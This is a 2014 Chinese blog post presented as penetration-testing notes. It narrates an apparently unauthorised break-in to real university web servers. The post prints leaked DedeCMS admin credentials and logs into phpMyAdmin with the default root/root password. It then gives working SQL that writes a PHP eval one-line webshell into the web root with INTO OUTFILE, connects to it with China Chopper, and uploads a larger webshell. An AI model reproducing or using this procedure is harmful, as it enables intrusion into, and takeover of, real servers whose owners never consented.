qileilove

blog已经转移至github,大家请访问 http://qaseven.github.io/

渗透测试笔记

今天朋友在入侵织梦的网站系统,通过最新的Exp获得了织梦后台的账号和密码
  账号:admin
  密码:abc123456
  但是,找来找去找不到后台,就让我提权试试。
  我看了下:http://pxc.ncist.edu.cn/dede/
  后台被删除了!怎么办??
  google hack也没找到后台
  后来,我试了试这个网站:http://zsjy.ncist.edu.cn/phpmyadmin
  输入默认MySql账号与密码:
  账号:root
  密码:root
  居然进去了:
  接下来就是phpmyadmin提权了:
  我的思路是:
  1.先爆出php服务器www的路径
  2.然后通过将php一句话插入数据库再导出到www路径
  通过google hack爆到路径:D\www\
  呵呵,接下来就执行sql语句:
CREATE TABLE `mysql`.`xss` (`xss1` TEXT NOT NULL );
INSERT INTO `mysql`.`xss` (`xss1` ) VALUES ('<?php @eval($_POST[milantgh])?>');
SELECT xss1 FROM `mysql`.`xss` INTO OUTFILE 'd:/www/x.php';
  这段sql意思是:
  1.在mysql数据库中建一张表叫xss,在xss表中生成一个field(字段)叫xss1
  2.将php一句话木马插入数据库中的xss1字段处
  3.将数据库中xss1字段的内容导出到d:\www\x.php文件中
  这下,通过chopper连接x.php小马得到shell


 接下来,上传一个php大马spider.php
  通过FF连接spider.php:
  成功获得webshell!!!

posted on 2014-04-24 10:21 顺其自然EVO 阅读(498) 评论(0)  编辑  收藏 所属分类: 测试学习专栏安全性测试


只有注册用户登录后才能发表评论。


网站导航:
 
<2014年4月>
303112345
6789101112
13141516171819
20212223242526
27282930123
45678910

导航

统计

常用链接

留言簿(55)

随笔分类

随笔档案

文章分类

文章档案

搜索

最新评论

阅读排行榜

评论排行榜